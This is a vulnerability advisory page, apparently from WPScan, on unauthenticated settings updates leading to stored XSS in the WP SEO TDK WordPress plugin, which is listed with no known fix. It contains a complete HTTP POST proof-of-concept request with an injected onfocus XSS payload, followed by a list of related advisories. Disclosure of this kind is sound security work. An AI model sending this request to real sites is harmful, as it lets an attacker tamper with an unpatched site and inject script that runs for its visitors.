WP SEO TDK <= 2.1.2 – Unauthenticated Setting Update to Stored XSS | Plugin Vulnerabilities

Description

The plugin does not have authorisation when updating its settings, and relies on a CSRF check, which unfortunately can be bypassed. As a result, unauthenticated users could update the plugin's settings, which could also lead to Stored XSS issue as some are not escaped

Proof of Concept

POST /wp-admin/admin-ajax.php?page=seo HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

action=seo-update&seo_split=A%22%20autofocus%20onfocus%3dalert(%2fXSS%2f)%2f%2f&_wp_http_referer=https://example.com/wp-admin/admin-ajax.php

Affects Plugins

No known fix

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

21e1432d-f19f-4ffb-ad93-0e48e995dbea

Timeline

Publicly Published

2021-07-20 (about 4 years ago)

Added

2022-05-02 (about 4 years ago)

Last Updated

2022-05-02 (about 4 years ago)

Other

Published

Title

Published

2024-03-06

Title

Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) < 2.8.8 - Missing Authorization to Unauthenticated Media Deletion

Published

2025-12-03

Title

Beaver Builder – WordPress Page Builder < 2.9.4.1 - Missing Authorization to Authenticated (Contributor+) Builder Status Tampering

Published

2026-01-06

Title

aBlocks – WordPress Gutenberg Blocks <= 2.4.0 - Missing Authorization to Authenticated (Subscriber+) Settings Modification

Published

2024-09-25

Title

Sunshine Photo Cart < 3.2.9 - Missing Authorization

Published

2024-11-28

Title

Smart Marketing SMS and Newsletters Forms < 5.0.5 - Missing Authorization